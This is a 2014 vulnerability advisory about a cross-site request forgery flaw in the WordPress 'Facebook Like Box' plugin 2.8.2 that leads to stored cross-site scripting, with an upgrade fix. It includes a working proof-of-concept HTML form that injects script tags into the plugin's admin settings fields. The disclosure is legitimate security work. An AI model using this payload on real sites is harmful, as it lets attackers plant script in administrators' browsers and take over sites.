WordPress Facebook Like Box plugin version 2.8.2 suffers from a cross site request forgery vulnerability that can be leveraged to trick an admin into storing cross site scripting code.
fbd7115249abacc1759c3198313fa977c9d2482a207b946edc53b58573a30152
Title: WordPress 'Facebook Like Box' plugin - CSRF/XSS
Version: 2.8.2
Reported by: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej
Date: 2014/12/12
Download: https://wordpress.org/plugins/cardoza-facebook-like-box/
Notified WordPress: 2014/11/27
----------------------------------------------------------------
## Description:
----------------------------------------------------------------
Facebook Like Box is a social plugin that enables Facebook Page owners to attract and gain Likes from their own website.
## CSRF:
----------------------------------------------------------------
It is possible to change the plugins admin settings by tricking a logged in admin to visit a crafted page.
## Stored XSS:
----------------------------------------------------------------
Settings data from the admin page is stored unsanitized and echo'ed on the plugin's admin page. This allows an attacker to perform XSS through these fields.
PoC:
Log in to a vulnerable site and press submit on this form:
<form method="POST" action="http://vuln.site/wp-admin/admin.php?page=slug_for_fb_like_box">
<input type="text" name="frm_title" value=""/><script>alert(1);</script>"><br />
<input type="text" name="frm_url" value=""/><script>alert(2);</script>"><br />
<input type="text" name="frm_border_color" value=""/><script>alert(3);</script>"><br />
<input type="text" name="frm_width" value=""/><script>alert(4);</script>"><br />
<input type="text" name="frm_height" value=""/><script>alert(5);</script>"><br />
<input type="text" name="frm_color_scheme" value="light"><br />
<input type="text" name="frm_show_faces" value="true"><br />
<input type="text" name="frm_stream" value="true"><br />
<input type="text" name="frm_header" value="true"><br />
<input type="text" name="frm_submit" value="Save"><br />
<input type="submit">
</form>
## Solution
----------------------------------------------------------------
You should upgrade to version 2.8.3.